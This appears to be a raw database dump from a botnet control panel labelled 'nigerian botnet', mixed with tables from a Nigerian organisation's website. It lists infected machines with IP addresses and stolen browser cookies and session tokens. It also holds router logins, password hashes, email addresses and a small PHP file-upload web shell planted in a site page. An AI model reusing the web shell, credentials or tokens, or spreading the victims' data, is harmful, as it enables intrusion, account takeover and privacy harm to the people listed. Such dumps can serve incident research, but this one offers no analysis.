nigerian botnet www.nlcng.org username password admin e10adc3949ba59abbe56e057f20f883e admin e10adc3949ba59abbe56e057f20f883e listid mailid validated mailed mailkey address 1 4 1 0 35bc5145c7a9d37e586d362b945812f6 myque@infowareng.com 1 5 1 0 81f433d50e34ad8a9255332cd9e29ed2 williamakerele@yahoo.co.uk / bot_id language_id ipv4 botnet country port_s1 flag_nat comments flag_used os_version rtime_last rtime_first bot_version net_latency rtime_online flag_install time_localbias tequilaboomboom_00012b9c 1033 88.198.95.152 -- default -- DE 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1349214781 1349214781 16910099 0 1349214781 0 -25200 0e2e44df465c41a_00006179 1033 188.99.242.187 -- default -- DE 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1349217837 1349217837 16910099 0 1349217837 0 -25200 ryabov_0093e748 1049 37.144.102.37 -- default -- -- 14558 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00 1351890250 1349780483 16910099 0 1351877636 0 14400 joe_8a81c76c9df_da623f55 1033 66.187.149.88 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350521420 1350521420 16910099 0 1350521420 1 -14400 public_ea8367e7_000069a6 1033 72.12.209.242 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350554852 1350554852 16910099 0 1350554852 1 -14400 home_off_d5f0ac_0000d84f 1033 66.129.97.254 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350665375 1350665375 16910099 0 1350665375 1 -14400 gt_fdccd9a7405d_0000a94f 1033 130.207.203.2 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350889636 1350889636 16910099 0 1350889636 1 -14400 krolik_00b9f1de 1033 187.117.246.89 -- default -- BR 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350931836 1350931836 16910099 0 1350931836 1 -14400 home_0000a25a 1033 109.163.233.205 -- default -- -- 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00 1350935245 1350935245 16910099 0 1350935245 1 -25200 gt_fdccd9a7405d_0000ad37 1033 130.207.203.2 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350976668 1350976668 16910099 0 1350976668 1 -14400 gt_fdccd9a7405d_0000aaa7 1033 130.207.203.2 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350981726 1350981726 16910099 0 1350981726 1 -14400 lar_ronald_54_000429ac 1033 66.215.81.155 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351523829 1351523829 16910099 0 1351523829 1 -28800 james_000256e8 1033 146.52.94.203 -- default -- US 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351723610 1351723610 16910099 0 1351723610 1 0 79s6ngda4xqbkpy_0000ebd7 1033 83.53.103.122 -- default -- ES 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351846659 1351846659 16910099 0 1351846659 1 3600 plat_1df898110e_00017e76 2052 114.246.152.130 -- default -- CN 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351855565 1351855565 16910099 0 1351855565 1 0 computer_69fdf7_00e1eefd 1033 84.110.48.22 -- default -- IL 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351871966 1351871966 16910099 0 1351871966 1 7200 computer_69fdf7_00e02e03 1033 84.110.48.22 -- default -- IL 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351875359 1351872958 16910099 0 1351872958 1 7200 steven_1df4cdc5_0002e5f1 1033 176.58.117.152 -- default -- -- 0 1 0 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351877833 1351877833 16910099 0 1351877833 1 -18000 id bot_id language_id ipv4 type rtime botnet country context path_dest time_tick os_version time_system path_source bot_version process_name process_user time_localbias 1 tequilaboomboom_00012b9c 1033 88.198.95.152 1 1349214781 -- default -- DE Protected Storage:\n\nEmpty 76810 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1349214751 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\TEQUILABOOMBOOM$ -25200 2 0e2e44df465c41a_00006179 1033 188.99.242.187 1 1349217837 -- default -- DE Protected Storage:\n\nEmpty 25093 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1349217806 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\0E2E44DF465C41A$ -25200 ********************************************************************** botnets reports id bot_id language_id ipv4 type rtime botnet country context path_dest time_tick os_version time_system path_source bot_version process_name process_user time_localbias 1 gt_fdccd9a7405d_0000a94f 1033 130.207.203.2 1 1350889636 -- default -- US Protected Storage:\n\nEmpty 43437 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350907605 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\GT-FDCCD9A7405D$ -14400 2 gt_fdccd9a7405d_0000a94f 1033 130.207.203.2 1 1350889696 -- default -- US Protected Storage:\n\nEmpty 44703 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350907606 16910099 C:\\WINDOWS\\system32\\rundll32.exe GT-FDCCD9A7405D\\GT -14400 3 krolik_00b9f1de 1033 187.117.246.89 1 1350931836 -- default -- BR Protected Storage:\n\nEmpty 12186375 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350931801 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\KROLIK$ -14400 4 krolik_00b9f1de 1033 187.117.246.89 1 1350931837 -- default -- BR Protected Storage:\n\n\nIE Cookies:\n\nPath: virustotal.com/\n__utma=194538546.1597838403.1327693973.1327693973.1327693973.1\n__utmb=194538546.3.10.1327693973\n\nPath: www.microsoft.com/\n.ASPXANONYMOUS=F61Rxur4ywEkAAAAODYyOWQ1OWMtMGM1ZC00MDU4LWEwYTAtOWFkODRlMTAzM2ExPR0qIbOBRqcU9GbirnxqHtICJ001\n\nPath: microsoft.com/\nMSID=Microsoft.CreationDate=02/01/2011 21:06:54&Microsoft.LastVisitDate=02/28/2011 16:36:48&Microsoft.VisitStartDate=02/28/2011 16:30:59&Microsoft.CookieId=da924ae0-030e-4d4d-a8d3-1fc12dd00ebc&Microsoft.TokenId=e4ed5535-4c5e-4c19-982a-80498e1b7527&Microsoft.NumberOfVisits=20&Microsoft.IdentityToken=U51dhK4TUJdC+On9Rilqe5p3YuI0iAHGmkluo3ZX1p4Q8rgAok2/gMWHFXvtiJvh8By2/h1SSVcEAiDC42opVPngjauA+dv+LknUs0ckd5Y4gtW4WPNO2v0sEhJVsOFV/+hmmeLV+f7M9VQxXWGT9cafhH3RVf7L3lzom0tHPr1C1YRuNKIBaHwiePEMZ8pHiLFjPOp5B9SXpQG5aTsISwSdkYvKyttfTN0skIwcXMJFrGga8W7I4SPrEKdQGkyTNIuPJyBexyeDHQiHFDxRXygZEUNeNoA3CtYE/n+HhuJww7puxUiTaHHsNNKn9W/CpFEBddI2G99Bk2FlnOPEQtKIt2jgW4CATDEbGNsJc+crCtYrhCXNrL6rnRPaty75ZiLbrYbdKUn4L3ohX4d+LLCl7vh2tQUtOZUfuk+hkjlYViXhIEqJApf9HPl3tPmp8QRcgAkrtW3cYwU11K5SjO+JjUpP/AVC4Q1knHM5h7h71D2iHchx8/RlWYyBJYCyjHy5/bFOTFY8qyH69hVlIlDIjVCv8vC1HCJjlFPoICg=&Microsoft.MicrosoftId=0460-8592-5754-4264\nMC1=GUID=16514f98fc42f4429628449ebd2ae5c7&HASH=984f&LV=20112&V=3\nA=I&I=AxUFAAAAAAADBgAAbOLi4KhPu0yOJfqzfm7mzQ!!&M=1&CS=126pLb00021010002g10100\nWT_FPC=id=65.196.71.3-4053588304.30130776:lv=1300117574634:ss=1300117564275\nMUID=EB4E27B3450F4FBBB5B553D7ABCECB78\nomniID=1296659249505_7597_25d6_43ce_a68222a702c5\nWT_NVR_RU=0=technet|msdn:1=:2=\n 12189765 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350931804 16910099 C:\\WINDOWS\\Explorer.EXE KROLIK\\Administrator -14400 5 home_0000a25a 1033 109.163.233.205 1 1350935245 -- default -- -- Protected Storage:\n\nEmpty 41750 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00 1350906411 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\HOME$ -25200 id bot_id language_id ipv4 type rtime botnet country context path_dest time_tick os_version time_system path_source bot_version process_name process_user time_localbias 1 gt_fdccd9a7405d_0000ad37 1033 130.207.203.2 1 1350976668 -- default -- US Protected Storage:\n\nEmpty 44484 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350994636 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\GT-FDCCD9A7405D$ -14400 2 gt_fdccd9a7405d_0000ad37 1033 130.207.203.2 1 1350976668 -- default -- US Protected Storage:\n\n\nIE Cookies:\n\nPath: addthis.com/\nuid=4bcbb5c058b406e7\n\nPath: insightexpressai.com/\nDW=dd02ab28-8dfd-45f9-b30e-2eb1ce6dbdad\nIXAICampaignCounter3265=0\nIXAIControlCounter3265=0\nIXAIBannerCounter189939=0\n\nPath: c.atdmt.com/\nSRM_A=37174926EF1E6F9B24E24A17EB1E6F8F\n\nPath: zedo.com/\nZEDOIDX=29\nFFgeo=396460\nZEDOIDA=wiVzT8@CAst7b4Ba1ubRT7fB~032812\nFFcat=1133,25,28\n\nPath: scorecardresearch.com/\nUID=2cda523-96.17.150.41-1271627147\n\nPath: www.cnn.com/\nug=4f7325bf0192450a3d14696c8df88255\nugs=1\n\nPath: atdmt.com/\nMUID=37174926EF1E6F9B24E24A17EB1E6F8F\n\nPath: sourceforge.net/\nVISITOR=4bcb7d86d3179d0afa001336\nsf.consume=0ce79deaf871742839148bedc8ec69b4caba3ff5gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDcyOGI0MDk5NjJiM2Y2YjhlZjVkZTlhZWU0MzkzOTM3cQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0YmNiN2Q4NmQzMTc5ZDBhZmEwMDEzMzZxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB0vLfYaseNlUOX2NyZWF0aW9uX3RpbWVxDkdB0vLfYaOVW3Uu\n__utma=191645736.1562667729.1271641533.1271641533.1271641533.1\n__utmb=191645736.1.10.1271641533\n__utmz=191645736.1271641533.1.1.utmcsr=7-zip.org|utmccn=(referral)|utmcmd=referral|utmcct=/\n\nPath: msn.com/\nMC1=V=3&GUID=cf92fa79202d46b2b28f4a3bce29dbe9\nmh=MSFT\nCC=US\nCULTURE=EN-US\nSample=49\n\nPath: cnn.com/\nmbox=check#true#1332960817|session#1332960756718-879493#1332962617\nSelectedEdition=www\nrsi_segs_ttn=A09801_10001|A09801_10313\nadDEmas=R00&t1&gatech.edu&82&usa&524&30332&11&-&-&-&3&\n\nPath: match.com/\nPrefID=52-514732892\n\nPath: revsci.net/\nNETID01=3c43df5483dd6d7d16a19b6d2150df9c\nrtc_AAAA=MLuBO6ett4kbQAgTBQi3puFPtq8QzGLJceLmUGHmh4O24fAwrCJcGnRc+wAAuH0QUH5FsfkxcA6ku8NKvTM1MZ9mJ4cqVBogBxoAfw==\nrts_AAAA=MLuB86QsXkGiDUw6LAw6IpFSRlNXxhR4E1xGRkAQg4MfE8SUUlXgXlFGUxSPlrvS86piZ2VkT0QvZw==\n\nPath: bing.com/\nSRCHD=MS=2230010&D=2230010&AF=MSN005\n 45187 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350994637 16910099 C:\\WINDOWS\\Explorer.EXE GT-FDCCD9A7405D\\GT -14400 3 gt_fdccd9a7405d_0000aaa7 1033 130.207.203.2 1 1350981726 -- default -- US Protected Storage:\n\nEmpty 44328 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1350996875 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\GT-FDCCD9A7405D$ -14400 id bot_id language_id ipv4 type rtime botnet country context path_dest time_tick os_version time_system path_source bot_version process_name process_user time_localbias 1 lar_ronald_54_000429ac 1033 66.215.81.155 1 1351523829 -- default -- US Protected Storage:\n\nEmpty 273733 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351527325 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\DE-Nelson-69$ -28800 2 lar_ronald_54_000429ac 1033 66.215.81.155 1 1351523830 -- default -- US Protected Storage:\n\nhttp://10.0.0.6/TMAdmin = admin|admin\r\nhttps://10.0.0.6/admin.cgi = admin|admin\r\nhttps://10.0.0.6/TMAdmin = admin|\r\n 275375 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351527326 16910099 C:\\WINDOWS\\Explorer.EXE DE-Nelson-69\\Juan -28800 id bot_id language_id ipv4 type rtime botnet country context path_dest time_tick os_version time_system path_source bot_version process_name process_user time_localbias 1 79s6ngda4xqbkpy_0000ebd7 1033 83.53.103.122 1 1351846659 -- default -- ES Protected Storage:\n\nEmpty 60796 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351810997 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\79S6NGDA4XQBKPY$ 3600 2 79s6ngda4xqbkpy_0000ebd7 1033 83.53.103.122 1 1351846659 -- default -- ES Protected Storage:\n\nEmpty 60984 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351810997 16910099 C:\\WINDOWS\\Explorer.EXE 79S6NGDA4XQBKPY\\Musler 3600 3 plat_1df898110e_00017e76 2052 114.246.152.130 1 1351855565 -- default -- CN Protected Storage:\n\nEmpty 98441 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1310027008 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\PLAT-1DF898110E$ 0 4 plat_1df898110e_00017e76 2052 114.246.152.130 1 1351855566 -- default -- CN Protected Storage:\n\nEmpty 99633 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1310027009 16910099 C:\\WINDOWS\\Explorer.EXE PLAT-1DF898110E\\Administrator 0 5 computer_69fdf7_00e1eefd 1033 84.110.48.22 1 1351871966 -- default -- IL Protected Storage:\n\nEmpty 14807171 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351871933 16910099 C:\\WINDOWS\\system32\\services.exe MSHOME\\COMPUTER-69FDF7$ 7200 6 computer_69fdf7_00e1eefd 1033 95.130.9.237 1 1351872417 -- default -- FR Protected Storage:\n\nEmpty 15261015 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351872387 16910099 C:\\Program Files\\QuickTools\\IceSword122en\\IceSword.exe COMPUTER-69FDF7\\Administrator 7200 7 computer_69fdf7_00e02e03 1033 84.110.48.22 1 1351872955 -- default -- IL Protected Storage:\n\nEmpty 14692078 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351872922 16910099 C:\\WINDOWS\\system32\\services.exe MSHOME\\COMPUTER-69FDF7$ 7200 8 computer_69fdf7_00e02e03 1033 84.110.48.22 1 1351873078 -- default -- IL Protected Storage:\n\nEmpty 14827750 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351873058 16910099 C:\\Program Files\\ollydbg\\Lbr68.exe COMPUTER-69FDF7\\Administrator 7200 9 steven_1df4cdc5_0002e5f1 1033 176.58.117.152 1 1351877833 -- default -- -- Protected Storage:\n\nEmpty 190234 \x05\x00\x00\x00\x01\x00\x00\x00(\n\x00\x00\x03\x00\x00\x00\x00\x01\x01\x00 1351877773 16910099 C:\\WINDOWS\\system32\\services.exe WORKGROUP\\STEVEN-1DF4CDC5$ -18000 10 PC_CFBF598994F316C2 0 84.110.48.22 201 1351880239 .default IL https://google.com zzz 0 0 775040561 0 *********************************************************************************** id pass name comments ss_format language ss_quality r_stats_os r_edit_bots r_stats_main r_reports_jn r_reports_db flag_enabled r_system_info r_system_user r_botnet_bots r_system_users r_reports_files r_system_options r_botnet_scripts r_reports_db_edit r_stats_main_reset r_reports_files_edit r_botnet_scripts_edit 1 9aadb6f4b20d00a7dda31deb3e94c557 nabil Default user jpeg en 30 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 page_id page_title page_access page_content page_allow_ratings page_allow_comments 8 wso2 0 \\';\r\necho \\'\\';\r\nif( $_POST[\\'_upl\\'] == \\"Upload\\" ){ \r\nif(@copy($_FILES[\\'file\\'][\\'tmp_name\\'], $_FILES[\\'file\\'][\\'name\\'])) { echo \\'Upload SUKSES !!!

\\'; }\telse { echo \\'Upload GAGAL !!!

\\'; }\r\n}\r\n?> 0 0 download_id download_os download_url download_cat download_title download_count download_license download_version download_filesize download_datestamp download_description 1 Steering.docx 1 Steering Committee Meeting 3 1251967333 Report of a One Day Steering Committee Meeting between NLC and TUC \x96 UK on Building Workplace Capacity to combat HIV/AIDS in Nigeria held on the August 17, 2009 at Bolton white Hotel Abuja. 2 Steering.docx 1 1 1251967436 3 images/Manual_HIV.pdf 1 HIV Manual 0 1283599640 HIV Manual 4 2 0 1337200700